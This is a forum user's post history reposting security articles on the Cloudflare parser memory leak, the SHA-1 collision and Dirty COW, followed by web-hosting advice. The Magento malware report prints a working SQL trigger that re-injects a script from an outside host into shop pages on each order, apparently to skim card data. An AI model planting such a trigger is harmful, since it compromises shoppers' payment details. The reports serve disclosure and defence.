Everything posted by NickTheGreek
-
Incident report on memory leak caused by Cloudflare parser bug

Last Friday, Tavis Ormandy from Google’s Project Zero contacted Cloudflare to report a security problem with our edge servers. He was seeing corrupted web pages being returned by some HTTP requests run through Cloudflare. It turned out that in some unusual circumstances, which I’ll detail below, our edge servers were running past the end of a buffer and returning memory that contained private information such as HTTP cookies, authentication tokens, HTTP POST bodies, and other sensitive data. And some of that data had been cached by search engines.

For the avoidance of doubt, Cloudflare customer SSL private keys were not leaked. Cloudflare has always terminated SSL connections through an isolated instance of NGINX that was not affected by this bug.

We quickly identified the problem and turned off three minor Cloudflare features (email obfuscation, Server-side Excludes and Automatic HTTPS Rewrites) that were all using the same HTML parser chain that was causing the leakage. At that point it was no longer possible for memory to be returned in an HTTP response.

Because of the seriousness of such a bug, a cross-functional team from software engineering, infosec and operations formed in San Francisco and London to fully understand the underlying cause, to understand the effect of the memory leakage, and to work with Google and other search engines to remove any cached HTTP responses. Having a global team meant that, at 12 hour intervals, work was handed over between offices enabling staff to work on the problem 24 hours a day. The team has worked continuously to ensure that this bug and its consequences are fully dealt with. One of the advantages of being a service is that bugs can go from reported to fixed in minutes to hours instead of months. The industry standard time allowed to deploy a fix for a bug like this is usually three months; we were completely finished globally in under 7 hours with an initial mitigation in 47 minutes.

The bug was serious because the leaked memory could contain private information and because it had been cached by search engines. We have also not discovered any evidence of malicious exploits of the bug or other reports of its existence. The greatest period of impact was from February 13 to February 18, with around 1 in every 3,300,000 HTTP requests through Cloudflare potentially resulting in memory leakage (that’s about 0.00003% of requests). We are grateful that it was found by one of the world’s top security research teams and reported to us.

This blog post is rather long but, as is our tradition, we prefer to be open and technically detailed about problems that occur with our service.

Parsing and modifying HTML on the fly

Many of Cloudflare’s services rely on parsing and modifying HTML pages as they pass through our edge servers. For example, we can insert the Google Analytics tag, safely rewrite http:// links to https://, exclude parts of a page from bad bots, obfuscate email addresses, enable AMP, and more by modifying the HTML of a page. To modify the page, we need to read and parse the HTML to find elements that need changing. Since the very early days of Cloudflare, we’ve used a parser written using Ragel. A single .rl file contains an HTML parser used for all the on-the-fly HTML modifications that Cloudflare performs.

About a year ago we decided that the Ragel-based parser had become too complex to maintain and we started to write a new parser, named cf-html, to replace it.
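As a quick sanity check on the impact figure quoted above, here is a small Python calculation (my own, not from the Cloudflare post) confirming that 1 request in every 3,300,000 really is about 0.00003% of requests:

# 1 in 3,300,000 expressed as a fraction and as a percentage
leak_rate = 1 / 3_300_000
print(f"{leak_rate:.2e} of requests")         # about 3.03e-07
print(f"{leak_rate * 100:.5f}% of requests")  # prints 0.00003%, matching the post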
This streaming parser works correctly with HTML5 and is much, much faster and easier to maintain. We first used this new parser for the Automatic HTTPS Rewrites feature and have been slowly migrating functionality that uses the old Ragel parser to cf-html.

Both cf-html and the old Ragel parser are implemented as NGINX modules compiled into our NGINX builds. These NGINX filter modules parse buffers (blocks of memory) containing HTML responses, make modifications as necessary, and pass the buffers onto the next filter.

For the avoidance of doubt: the bug is not in Ragel itself. It is in Cloudflare's use of Ragel. This is our bug and not the fault of Ragel.

It turned out that the underlying bug that caused the memory leak had been present in our Ragel-based parser for many years but no memory was leaked because of the way the internal NGINX buffers were used. Introducing cf-html subtly changed the buffering which enabled the leakage even though there were no problems in cf-html itself.

Once we knew that the bug was being caused by the activation of cf-html (but before we knew why) we disabled the three features that caused it to be used. Every feature Cloudflare ships has a corresponding feature flag, which we call a ‘global kill’. We activated the Email Obfuscation global kill 47 minutes after receiving details of the problem and the Automatic HTTPS Rewrites global kill 3h05m later. The Email Obfuscation feature had been changed on February 13 and was the primary cause of the leaked memory, thus disabling it quickly stopped almost all memory leaks. Within a few seconds, those features were disabled worldwide. We confirmed we were not seeing memory leakage via test URIs and had Google double check that they saw the same thing.

We then discovered that a third feature, Server-Side Excludes, was also vulnerable and did not have a global kill switch (it was so old it preceded the implementation of global kills). We implemented a global kill for Server-Side Excludes and deployed a patch to our fleet worldwide. From realizing Server-Side Excludes were a problem to deploying a patch took roughly three hours. However, Server-Side Excludes are rarely used and only activated for malicious IP addresses.

Root cause of the bug

The Ragel code is converted into generated C code which is then compiled. The C code uses, in the classic C manner, pointers to the HTML document being parsed, and Ragel itself gives the user a lot of control of the movement of those pointers. The underlying bug occurs because of a pointer error.

/* generated code */
if ( ++p == pe )
    goto _test_eof;

The root cause of the bug was that reaching the end of a buffer was checked using the equality operator and a pointer was able to step past the end of the buffer. This is known as a buffer overrun. Had the check been done using >= instead of ==, jumping over the buffer end would have been caught. The equality check is generated automatically by Ragel and was not part of the code that we wrote. This indicated that we were not using Ragel correctly.

The Ragel code we wrote contained a bug that caused the pointer to jump over the end of the buffer and past the ability of an equality check to spot the buffer overrun.

Here’s a piece of Ragel code used to consume an attribute in an HTML <script> tag. The first line says that it should attempt to find zero or more unquoted_attr_char followed by (that’s the :>> concatenation operator) whitespace, forward slash or > signifying the end of the tag.
script_consume_attr := ((unquoted_attr_char)* :>> (space|'/'|'>')) >{ ddctx("script consume_attr"); } @{ fhold; fgoto script_tag_parse; } $lerr{ dd("script consume_attr failed"); fgoto script_consume_attr; }; If an attribute is well-formed, then the Ragel parser moves to the code inside the @{ } block. If the attribute fails to parse (which is the start of the bug we are discussing today) then the $lerr{ } block is used. For example, in certain circumstances (detailed below) if the web page ended with a broken HTML tag like this: <script type= the $lerr{ } block would get used and the buffer would be overrun. In this case the $lerr does dd(“script consume_attr failed”); (that’s a debug logging statement that is a nop in production) and then does fgoto script_consume_attr; (the state transitions to script_consume_attr to parse the next attribute). From our statistics it appears that such broken tags at the end of the HTML occur on about 0.06% of websites. If you have a keen eye you may have noticed that the @{ } transition also did a fgoto but right before it did fhold and the $lerr{ } block did not. It’s the missing fhold that resulted in the memory leakage. Internally, the generated C code has a pointer named p that is pointing to the character being examined in the HTML document. fhold is equivalent to p-- and is essential because when the error condition occurs p will be pointing to the character that caused the script_consume_attr to fail. And it’s doubly important because if this error condition occurs at the end of the buffer containing the HTML document then p will be after the end of the document (p will be pe + 1 internally) and a subsequent check that the end of the buffer has been reached will fail and p will run outside the buffer. Adding an fhold to the error handler fixes the problem. Why now That explains how the pointer could run past the end of the buffer, but not why the problem suddenly manifested itself. After all, this code had been in production and stable for years. Returning to the script_consume_attr definition above: script_consume_attr := ((unquoted_attr_char)* :>> (space|'/'|'>')) >{ ddctx("script consume_attr"); } @{ fhold; fgoto script_tag_parse; } $lerr{ dd("script consume_attr failed"); fgoto script_consume_attr; }; What happens when the parser runs out of characters to parse while consuming an attribute differs whether the buffer currently being parsed is the last buffer or not. If it’s not the last buffer, then there’s no need to use $lerr as the parser doesn’t know whether an error has occurred or not as the rest of the attribute may be in the next buffer. But if this is the last buffer, then the $lerr is executed. Here’s how the code ends up skipping over the end-of-file and running through memory. The entry point to the parsing function is ngx_http_email_parse_email (the name is historical, it does much more than email parsing). ngx_int_t ngx_http_email_parse_email(ngx_http_request_t *r, ngx_http_email_ctx_t *ctx) { u_char *p = ctx->pos; u_char *pe = ctx->buf->last; u_char *eof = ctx->buf->last_buf ? pe : NULL; You can see that p points to the first character in the buffer, pe to the character after the end of the buffer and eof is set to pe if this is the last buffer in the chain (indicated by the last_buf boolean), otherwise it is NULL. 
When the old and new parsers are both present during request handling a buffer such as this will be passed to the function above: (gdb) p *in->buf $8 = { pos = 0x558a2f58be30 "<script type=\"", last = 0x558a2f58be3e "", [...] last_buf = 1, [...] } Here there is data and last_buf is 1. When the new parser is not present the final buffer that contains data looks like this: (gdb) p *in->buf $6 = { pos = 0x558a238e94f7 "<script type=\"", last = 0x558a238e9504 "", [...] last_buf = 0, [...] } A final empty buffer (pos and last both NULL and last_buf = 1) will follow that buffer but ngx_http_email_parse_email is not invoked if the buffer is empty. So, in the case where only the old parser is present, the final buffer that contains data has last_buf set to 0. That means that eof will be NULL. Now when trying to handle script_consume_attr with an unfinished tag at the end of the buffer the $lerr will not be executed because the parser believes (because of last_buf) that there may be more data coming. The situation is different when both parsers are present. last_buf is 1, eof is set to pe and the $lerr code runs. Here’s the generated code for it: /* #line 877 "ngx_http_email_filter_parser.rl" */ { dd("script consume_attr failed"); {goto st1266;} } goto st0; [...] st1266: if ( ++p == pe ) goto _test_eof1266; The parser runs out of characters while trying to perform script_consume_attr and p will be pe when that happens. Because there’s no fhold (that would have done p--) when the code jumps to st1266 p is incremented and is now past pe. It then won’t jump to _test_eof1266 (where EOF checking would have been performed) and will carry on past the end of the buffer trying to parse the HTML document. So, the bug had been dormant for years until the internal feng shui of the buffers passed between NGINX filter modules changed with the introduction of cf-html. Going bug hunting Research by IBM in the 1960s and 1970s showed that bugs tend to cluster in what became known as “error-prone modules”. Since we’d identified a nasty pointer overrun in the code generated by Ragel it was prudent to go hunting for other bugs. Part of the infosec team started fuzzing the generated code to look for other possible pointer overruns. Another team built test cases from malformed web pages found in the wild. A software engineering team began a manual inspection of the generated code looking for problems. At that point it was decided to add explicit pointer checks to every pointer access in the generated code to prevent any future problem and to log any errors seen in the wild. The errors generated were fed to our global error logging infrastructure for analysis and trending. #define SAFE_CHAR ({\ if (!__builtin_expect(p < pe, 1)) {\ ngx_log_error(NGX_LOG_CRIT, r->connection->log, 0, "email filter tried to access char past EOF");\ RESET();\ output_flat_saved(r, ctx);\ BUF_STATE(output);\ return NGX_ERROR;\ }\ *p;\ }) And we began seeing log lines like this: 2017/02/19 13:47:34 [crit] 27558#0: *2 email filter tried to access char past EOF while sending response to client, client: 127.0.0.1, server: localhost, request: "GET /malformed-test.html HTTP/1.1” Every log line indicates an HTTP request that could have leaked private memory. By logging how often the problem was occurring we hoped to get an estimate of the number of times HTTP request had leaked memory while the bug was present. 
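To make the pointer arithmetic easier to follow, here is a toy Python simulation (my own sketch, not Cloudflare's generated C) in which the index i stands in for the pointer p and end stands in for pe. It shows why the equality test can never fire once the missing fhold lets the index step past the end, and how a SAFE_CHAR-style guard catches the bad access instead:

buf = "<script type="        # final buffer ending in a broken tag, as in the example above
end = len(buf)               # plays the role of pe: one past the last valid index

def scan(apply_hold):
    i = end                  # parser ran out of input mid-attribute, so i == end
    if apply_hold:
        i -= 1               # fhold: step back onto the character that caused the failure
    i += 1                   # the generated transition then advances, like ++p
    if i == end:             # the generated end-of-buffer test uses equality
        return "end-of-buffer detected, scan stops safely"
    return "check missed: i = %d is already past the end (%d)" % (i, end)

print("with fhold:   ", scan(True))
print("without fhold:", scan(False))

# A defensive guard in the spirit of the SAFE_CHAR macro checks every access instead:
def safe_char(i):
    if not 0 <= i < end:
        raise IndexError("tried to access char past EOF")   # logged as critical in production
    return buf[i]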
In order for the memory to leak the following had to be true:

The final buffer containing data had to finish with a malformed script or img tag
The buffer had to be less than 4k in length (otherwise NGINX would crash)
The customer had to either have Email Obfuscation enabled (because it uses both the old and new parsers as we transition),
… or Automatic HTTPS Rewrites/Server-Side Excludes (which use the new parser) in combination with another Cloudflare feature that uses the old parser.
… and Server-Side Excludes only execute if the client IP has a poor reputation (i.e. it does not work for most visitors).

That explains why the buffer overrun resulting in a leak of memory occurred so infrequently. Additionally, the Email Obfuscation feature (which uses both parsers and would have enabled the bug to happen on the greatest number of Cloudflare sites) was only enabled on February 13 (four days before Tavis’ report).

The three features implicated were rolled out as follows. The earliest date memory could have leaked is 2016-09-22.

2016-09-22 Automatic HTTPS Rewrites enabled
2017-01-30 Server-Side Excludes migrated to new parser
2017-02-13 Email Obfuscation partially migrated to new parser
2017-02-18 Google reports problem to Cloudflare and leak is stopped

The greatest potential impact occurred for four days starting on February 13 because Automatic HTTPS Rewrites wasn’t widely used and Server-Side Excludes only activate for malicious IP addresses.

Internal impact of the bug

Cloudflare runs multiple separate processes on the edge machines and these provide process and memory isolation. The memory being leaked was from a process based on NGINX that does HTTP handling. It has a separate heap from processes doing SSL, image re-compression, and caching, which meant that we were quickly able to determine that SSL private keys belonging to our customers could not have been leaked.

However, the memory space being leaked did still contain sensitive information. One obvious piece of information that had leaked was a private key used to secure connections between Cloudflare machines. When processing HTTP requests for customers’ web sites our edge machines talk to each other within a rack, within a data center, and between data centers for logging, caching, and to retrieve web pages from origin web servers. In response to heightened concerns about surveillance activities against Internet companies, we decided in 2013 to encrypt all connections between Cloudflare machines to prevent such an attack even if the machines were sitting in the same rack. The private key leaked was the one used for this machine to machine encryption. There were also a small number of secrets used internally at Cloudflare for authentication present.

External impact and cache clearing

More concerning was the fact that chunks of in-flight HTTP requests for Cloudflare customers were present in the dumped memory. That meant that information that should have been private could be disclosed. This included HTTP headers, chunks of POST data (perhaps containing passwords), JSON for API calls, URI parameters, cookies and other sensitive information used for authentication (such as API keys and OAuth tokens). Because Cloudflare operates a large, shared infrastructure, an HTTP request to a Cloudflare web site that was vulnerable to this problem could reveal information about an unrelated Cloudflare site.
An additional problem was that Google (and other search engines) had cached some of the leaked memory through their normal crawling and caching processes. We wanted to ensure that this memory was scrubbed from search engine caches before the public disclosure of the problem so that third-parties would not be able to go hunting for sensitive information. Our natural inclination was to get news of the bug out as quickly as possible, but we felt we had a duty of care to ensure that search engine caches were scrubbed before a public announcement. The infosec team worked to identify URIs in search engine caches that had leaked memory and get them purged. With the help of Google, Yahoo, Bing and others, we found 770 unique URIs that had been cached and which contained leaked memory. Those 770 unique URIs covered 161 unique domains. The leaked memory has been purged with the help of the search engines. We also undertook other search expeditions looking for potentially leaked information on sites like Pastebin and did not find anything. Some lessons The engineers working on the new HTML parser had been so worried about bugs affecting our service that they had spent hours verifying that it did not contain security problems. Unfortunately, it was the ancient piece of software that contained a latent security problem and that problem only showed up as we were in the process of migrating away from it. Our internal infosec team is now undertaking a project to fuzz older software looking for potential other security problems. Detailed Timeline We are very grateful to our colleagues at Google for contacting us about the problem and working closely with us through its resolution. All of which occurred without any reports that outside parties had identified the issue or exploited it. All times are UTC. 2017-02-18 0011 Tweet from Tavis Ormandy asking for Cloudflare contact information 2017-02-18 0032 Cloudflare receives details of bug from Google 2017-02-18 0040 Cross functional team assembles in San Francisco 2017-02-18 0119 Email Obfuscation disabled worldwide 2017-02-18 0122 London team joins 2017-02-18 0424 Automatic HTTPS Rewrites disabled worldwide 2017-02-18 0722 Patch implementing kill switch for cf-html parser deployed worldwide 2017-02-20 2159 SAFE_CHAR fix deployed globally 2017-02-21 1803 Automatic HTTPS Rewrites, Server-Side Excludes and Email Obfuscation re-enabled worldwide NOTE: This post was updated to reflect updated information. https://blog.cloudflare.com/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/
-
Back in the old days, “going online” meant calling up with your modem at 300 bits per second and interacting slowly with a basic command prompt (sometimes BASIC in the literal sense). Noise on the line and other electrical interference could easily turn zeros into ones and vice versa, causing corruption in your session, such as BANANA turned into BANAMA, MANGO into MaNGO, or even ONLINE into +++ATZ.

A common way to spot obvious errors automatically was by using a checksum, quite literally calculated by checking the sum of all the numeric values of every byte in the message. Checksums were used because they were quick to calculate, as far back as the 1960s and 1970s, because even the most underpowered processors usually had an ADD or ACCUMULATE instruction that could efficiently maintain a running total of this sort.

But checksums were error prone. If you swap round any of the bytes in a message, the checksum remains unchanged because A+B = B+A. Likewise, two errors can easily cancel out, for example if BANANA gets corrupted into CANAMA, because (A+1) + (B-1) = A+B.

Enter the CRC

CRCs, short for cyclic redundancy checks, were a better solution, using a comparatively simple series of bit-shifts and XOR operations to maintain a bigger accumulator that wasn’t so easily fooled by double errors or swapped bytes. CRC-32 produces a 32-bit (4-byte) checksum – today, the term checksum is used metaphorically, not literally to mean that the bytes were added together – designed to do a much better job of detecting accidental errors such as those caused by mistyping or by modem corruption.

But CRCs aren’t any good against deliberate errors. That’s because CRCs are based on a process involving a form of long division, making the algorithm predictable, so the output can be tweaked to be whatever you like by tweaking the input slightly in a way that can be calculated automatically. That makes it trivial to create a message with any checksum you like, for example so that its checksum matches an earlier message in order to create confusion, commit fraud, or worse.

Note that there are only 4 billion (2^32) different possible CRC-32 values, so that at modern computer speeds you could forge a CRC-32 without any arithmetical trickery by brute force, simply by making billions of random modifications to the message until you hit paydirt. But even if you extend your CRC to 64 bits, 128 bits or even more to make accidental duplicates as good as impossible, it’s still easy to calculate forgeries very quickly, with no need to rely on brute force.

Moving up to cryptographic hashes

For security-related purposes, you need what’s commonly referred to as a cryptographic checksum or cryptographic hash. This sort of algorithm is designed not only to detect accidental errors, but also to be “untrickable” enough to prevent deliberate errors. In particular, a cryptographic hash, denoted here as a mathematical function H(), should have at least these characteristics:

If you deliberately create two messages M1 and M2 (any two messages; you get to choose both of them) such that H(M1) = H(M2), you have a collision, so that H has failed as a digital fingerprint. Therefore you should not be able to construct a collision, other than by trying over and over with different inputs until you hit the jackpot by chance.

If you know that H(M) = X, but you don’t know my message M, then you should not be able to “go backwards” from X to M, other than by trying different messages over and over until you hit the jackpot by chance.
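To see how weak a literal byte-sum checksum is, here is a short illustrative Python sketch (my own example, not from the article): the swapped-byte message and the BANANA-to-CANAMA corruption both leave the sum unchanged, while CRC-32 from the standard zlib module tells all three messages apart.

import zlib

def byte_sum_checksum(msg: bytes) -> int:
    """Literal checksum: add up every byte value (mod 2**32)."""
    return sum(msg) & 0xFFFFFFFF

original  = b"BANANA"
swapped   = b"ABNANA"   # two bytes swapped: A+B == B+A
cancelled = b"CANAMA"   # (A+1) + (B-1) == A+B

for msg in (original, swapped, cancelled):
    print(msg, byte_sum_checksum(msg), hex(zlib.crc32(msg)))

All three byte sums come out to 417, but the three CRC-32 values differ; as the article explains, though, CRC-32 still offers no protection against someone deliberately engineering a matching value.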
If I choose M and tell you what it is, so you can compute H(M) = X for yourself, you should not be able to come up with a different message M’ that also has H(M’) = X, other than by guesswork. (This is much tougher than case 1 because you don’t get to choose any matching pair of hashes from a giant pool of messages. You have to match my hash, not any hash, which squares the effort needed.)

For many years, an algorithm called MD5 was widely used because it claimed to provide these three protections against abuse, but it is now forbidden in the cryptographic world because it is known to fail on Promise One above. Once a hashing algorithm fails in respect of Promise One, it’s prudent to assume it won’t meet its other design goals either, even if it seems to be holding out on the other two promises. MD5 collisions are easy to generate on purpose, so the algorithm can no longer be trusted.

SHA-1 replaces MD5

SHA-1 was the next-most-complex hash after MD5, and was widely used as a replacement when MD5 fell out of favour. Greatly oversimplified, the SHA-1 algorithm consumes its input in blocks of sixteen 32-bit words (512 bits, or 64 bytes), mixing each block into a cumulative hash of five 32-bit words (160 bits, or 20 bytes).

for block in blocks() do
   for i = 17 to 80 do
      -- each step here extends the original 16-word input
      -- block to 80 words by adding one word made by mixing
      -- together four of the previous sixteen words.
      block[i] = minimixtogether(block,i)
   end
   for i = 1 to 80 do
      -- each step here mixes one of the words from the 80-word
      -- "extended block" into the five-word hash accumulator
      hash = giantmixtogether(block,i)
   end
end

The giantmixtogether() function that scrambles the extended input into the hash uses a range of different operations, including NOT, AND, OR, XOR, ADD and ROL (rotate left); the minimixtogether() function used to massage the input data uses XOR and ROL.

The algorithm certainly looks complicated, and at first glance you would assume that it mixes-minces-shreds-and-liquidises its input more than well enough to be “untrickable”. Indeed, the complexity of SHA-1 was considered sufficient to immunise it against the weaknesses in the similar but simpler MD5 algorithm. At the same time, SHA-1 was not so much more complicated than MD5 that it would run too slowly to be a convenient replacement.

SHA-1 considered harmful

For years, however, experts have been telling everyone to stop using SHA-1, and to use more complex hash algorithms such as SHA-2 and SHA-3 instead, predicting that the first actual real-world, in-your-face chink in SHA-1’s armour would turn up soon. Google’s Chrome browser, for example, stopped accepting web site certificates with SHA-1 hashes at the start of 2017, considering them no longer safe enough. The Mozilla Firefox browser will soon follow suit.

The reason is simple: as soon as someone actually turns theory into reality, and produces a hash collision, you can no longer rely on saying, “She’ll be right for a while yet,” because your “while yet” period just expired. So it’s a good idea to get ahead of the game and to abandon creaky cryptographic code before it goes “Bang!”

Even if a collision takes an enormous amount of work – imagine that you’d need 110 top-end graphics cards running flat out for a whole year, for example – the first actual collision would be what you might call the digital disproof of the pudding.
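For a concrete feel of the fingerprint behaviour those three promises describe, here is a small Python sketch (my own example) using the standard hashlib module: changing a single character of the message changes every digest completely. MD5 and SHA-1 appear only for comparison; as the article explains, they should no longer be trusted for security work.

import hashlib

m1 = b"Pay Alice $100"
m2 = b"Pay Alice $900"   # a single-character change

for algo in ("md5", "sha1", "sha256"):
    print(algo, hashlib.new(algo, m1).hexdigest())
    print(algo, hashlib.new(algo, m2).hexdigest())
    print()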
The digital disproof So, to cut what has become a long story short, you need to know that researchers from Google and the CWI Institute in Amsterdam… …have just disproved the pudding. Bang! A hash collision that in theory should have taken them thousands of years to stumble upon by chance has been created on purpose within all of our lifetimes – and that should simply never have happened. Apparently, they did indeed need 110 top-end graphics cards running for a whole year, but that is still 100,000 times faster than the design goals (and the theoretical strength) of SHA-1, making SHA-1 a risky proposition for evermore. TL;DR: SHA-1 really is broken, so use a stronger hash from now on, because cryptographic attacks only ever get faster. https://nakedsecurity.sophos.com/2017/02/23/bang-sha-1-collides-at-38762cf7f55934b34d179ae6a4c80cadccbb7f0a/
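As a rough check of the "100,000 times faster" claim above: the theoretical collision strength of a 160-bit hash such as SHA-1 is about 2^80 computations (the birthday bound), and the published collision is commonly reported to have cost roughly 2^63 SHA-1 computations. That 2^63 figure is an outside estimate, not something stated in the article itself, but the ratio works out to about the factor quoted:

brute_force = 2 ** 80    # birthday-bound work to collide a 160-bit hash by chance
shattered   = 2 ** 63    # commonly cited cost of the first public SHA-1 collision (assumption)
print("speed-up factor: about %.0f" % (brute_force / shattered))   # ~131072, i.e. roughly 100,000x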
-
https://dirtycow.ninja/
-
Dirty COW (Dirty copy-on-write) is a computer security vulnerability for the Linux kernel that affects all Linux-based operating systems, including Android. It is a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism in the kernel's memory-management subsystem. The vulnerability was discovered by Phil Oester. Because of the race condition, with the right timing, a local attacker can exploit the copy-on-write mechanism to turn a read-only mapping of a file into a writable mapping. Although it is a local privilege escalation bug, remote attackers can use it in conjunction with other exploits that allow remote execution of non-privileged code to achieve remote root access on a computer.[1] The attack itself does not leave traces in the system log.

The vulnerability has the CVE designation CVE-2016-5195. The Debian operating system distribution has announced that it has released a patch for the vulnerability. Dirty COW was one of the first security issues transparently fixed in Ubuntu by the Canonical Live Patch service. It has been demonstrated that the bug can be utilized to root any Android device up to Android version 7.

History

The bug has been lurking in the Linux kernel since version 2.6.22, released in September 2007, and there is information that it has been actively exploited at least since October 2016.[2] The bug has been patched in Linux kernel versions 4.8.3, 4.7.9, 4.4.26 and newer.

Applications

The Dirty COW vulnerability has many perceived use cases, including proven examples such as obtaining root permissions in Android devices, as well as several speculated implementations. There are many binaries used in Linux which are read-only, and can only be modified or written to by a user of higher permissions, such as root. When privileges are escalated, whether by legitimate or illegitimate means – such as by using the Dirty COW exploit – the user can modify usually unmodifiable binaries and files. If a malicious individual could use the Dirty COW vulnerability to escalate their permissions, they could change a file, such as /bin/bash, so that it performs additional, unexpected functions, such as acting as a keylogger. When a standard user uses /bin/bash, they will not know that they are actually providing their passwords and activity to a malicious third party.

Remedies and recourse

At the dawn of its discovery, anyone using a machine running Linux was susceptible to the exploit. The only complete cure for this exploit is a patch, or running a newer version which is not vulnerable anymore. Linus Torvalds committed a patch on 18 October 2016, acknowledging that it was an ancient bug for which a fix had actually been attempted once, eleven years earlier. Some distributors provide patches, such as Canonical, who provide a live patch. In the absence of a patch, there are a few mitigation technologies, including STAP, and very little security from SELinux or AppArmor. Antivirus software has the potential to detect elevated permissions attacks, but it cannot prevent the attack. When given the opportunity, the safest route is to upgrade the Linux kernel to the following versions:

Earliest kernel version fixed    Linux OS that uses this
3.2.0-113.155                    Ubuntu 12.04 LTS
3.13.0-100.147                   Ubuntu 14.04 LTS (Linux Mint 17.1)
3.16.36-1+deb8u2                 Debian 8
4.4.0-45.66                      Ubuntu 16.04 LTS
4.7.8-1                          Debian unstable
4.8.0-26.28                      Ubuntu 16.10

https://en.wikipedia.org/wiki/Dirty_COW
-
10 Illustrations That Show Just How Much the Internet Has Changed Our Lives None of us should ever succumb to panic — real life is definitely still out there despite the huge role that the Internet plays in modern life. Gadgets and technology play a part in our lives, but it really is just a part. Nevertheless, it’s funny to think about the hundreds of little ways these things have changed our behavior. Here are 10 of the ones we at Bright Side have noticed. How many do you recognize? Illustrator: Astkhik Rakimova exclusively for Bright Side Preview photo credit Laughing Colours
-
Security experts have discovered a new SQL malware targeting online shops running on Magento that hides its code in the website’s database.

Security experts have discovered a new strain of malware targeting websites running the Magento eCommerce platform. The novelty is that this is the first malware of its kind written entirely in SQL, hiding its code in the website’s database. The malware is triggered every time a user places a new order; the “SQL trigger” is then executed before the Magento platform even assembles the web page.

The researcher Willem de Groot, who first analyzed the SQL malware discovered by Jeroen Boersma, explained that this is a significant evolution in the threat landscape.

“The trigger is executed every time a new order is made. The query checks for the existence of the malware in the header, footer, copyright and every CMS block. If absent, it will re-add itself.” reads the blog post published by Willem de Groot. “This discovery shows we have entered a new phase of malware evolution. Just scanning files is not enough anymore, malware detection methods should now include database analysis.”

The malware could be used to steal payment card data belonging to the users of Magento eCommerce websites.

In order to discover the presence of the SQL malware, administrators have to inspect the database for suspicious SQL triggers, such as those containing admin, .js, script or < (HTML tags):

echo 'SHOW TRIGGERS' | n98-magerun db:console

Once the malicious trigger is discovered, it is possible to delete it with a command like the following one:

echo "DROP TRIGGER <trigger_name>" | n98-magerun db:console

According to the expert, SQL malware attacks start with a brute force attack on /rss/catalog/notifystock/ for an otherwise completely patched shop. Below is the pattern discovered by Jeroen Boersma:

TRIGGER `after_insert_order` AFTER INSERT ON `sales_flat_order` FOR EACH ROW
BEGIN
  UPDATE core_config_data
  SET value = IF(
    value LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%',
    value,
    CONCAT(value, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>')
  )
  WHERE path='design/head/includes'
     OR path='design/footer/absolute_footer'
     OR path='design/footer/copyright';
  UPDATE cms_block
  SET content = IF(
    content LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%',
    content,
    CONCAT(content, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>')
  );
END;

de Groot has updated the Magereport and the Malware Scanner to detect this new type of malware.

http://securityaffairs.co/wordpress/56373/malware/sql-malware.html
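If you prefer to automate the trigger inspection described above, here is a minimal Python sketch; it assumes the pymysql package is installed and the connection details are placeholders for your own Magento database. It simply runs SHOW TRIGGERS and flags any trigger whose body contains the suspicious markers mentioned in the article:

import pymysql

SUSPICIOUS = ("script", ".js", "admin", "<")

conn = pymysql.connect(host="localhost", user="magento_user",
                       password="secret", database="magento_db")  # placeholder credentials
try:
    with conn.cursor() as cur:
        cur.execute("SHOW TRIGGERS")
        for row in cur.fetchall():
            name, statement = row[0], row[3]   # columns: Trigger, Event, Table, Statement, ...
            if any(marker in statement.lower() for marker in SUSPICIOUS):
                print("Suspicious trigger:", name)
                print(statement, "\n")
finally:
    conn.close()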
-
Choosing a web hosting company is a big decision having many consequences. The hosting company greatly influences your website’s speed and reliability, causing your visitors to leave with either a good or bad impression. Whether you’re looking to host your very first site or want to move an existing site to a new provider, taking the time to think through each of the following items can help you feel confident that you have made the best decision that will meet your needs long into the future.

Physical Hardware—With the physical hardware running your site being one of the most important considerations, take the time to research the server types a hosting company is using. Is high-speed SSD storage included? Does it use redundant devices, such as RAID-configured hard drives? What is its response time when replacing failed hardware and are backups onsite?

Technical Support Team—No matter how good a host may be, it’s likely you’ll need to work with its support team at some point. Discover your comfort level when communicating with them upfront, as this may very well impact how quickly you arrive at issue resolution.

Response Times & Contact Options—Some web hosts require that you work through their ticketing system. Others have a phone-in option, use live web chat, or want you to reach them via email. So what is the best way to get in touch with them? Is the team available 24/7 or only during certain hours?

Reputation—In evaluating host contenders, reading reviews can help you make a more informed decision. A company I worked for (Hostadvice.com) is one of the resources you can use here—it’s a community of webmasters who share their experiences with different hosting providers to help find the most suitable option.

Hosting Features—Beyond providing you a server(s) where you can load your site contents, some hosts include many features, others make them available as add-ons, and still others don’t offer any of them. These include:

Disk storage and bandwidth limitations
Software installation script library
SSL certificates
Website design tools and themes
Daily backups and fee for restores (if any)
Site migration
SPAM protection
Domain registration and privacy protection

Acquaint yourself with each host’s feature list in determining those that best match your specific needs.

Price of Hosting—Web host pricing is nowhere near uniform. Only by taking the time to comparatively shop will you find a company that offers high quality hosting at a reasonable price. Determine accepted payment methods and look for discounts if you’re able to pay for service a year in advance.

Control Panel—A control panel or portal is the interface you’ll use to manage your website once it’s live. Here you can do such tasks as perform a manual backup, reset your server (if allowed), or configure additional domains. Two of the most popular control panel options are cPanel and Plesk. Choosing a host that offers one of these helps make site maintenance easier.

Datacenter Geolocation—Having your site hosted at a datacenter that is geographically close to your target audience helps maximize the site load speed experienced by your visitors. Having said that, organizations catering to a global audience should disregard this and consider using a content delivery network instead (see below), as it will replicate their website in multiple geolocations to improve performance.
Content Delivery Network—If your site is likely to have high bandwidth requirements, serve large files, or have other significant demands, you’ll want a content delivery network (CDN) to serve up at least a portion of your content. A CDN enables your site to quickly and efficiently serve a very high number of customers—performance that isn’t always possible using traditional hosting options. The host should also make CDN integration easy for you.

Website Security—In addition to other threats, distributed denial of service (DDoS) attacks are a frequent cyberattack form, with millions of sites being hit every day at a rate of tens, or even hundreds of gigs per second. Protection is a critical component for any website. Most web hosts offer basic security/firewall and DDoS protection, but the most effective threat mitigation available today involves routing all of your site traffic through a service that scrubs out nefarious traffic before it has an opportunity to wreak havoc with your content.

Room for Growth—In starting a new website, perhaps you only need a simple, shared hosting account. But once it becomes a success, your hosting needs will likely grow commensurately. In looking ahead, then, you may want to use a hosting company that provides such expansion options as virtual private servers (VPSs), dedicated servers, cloud hosting, and more.

https://www.incapsula.com/blog/choosing-web-host.html
-
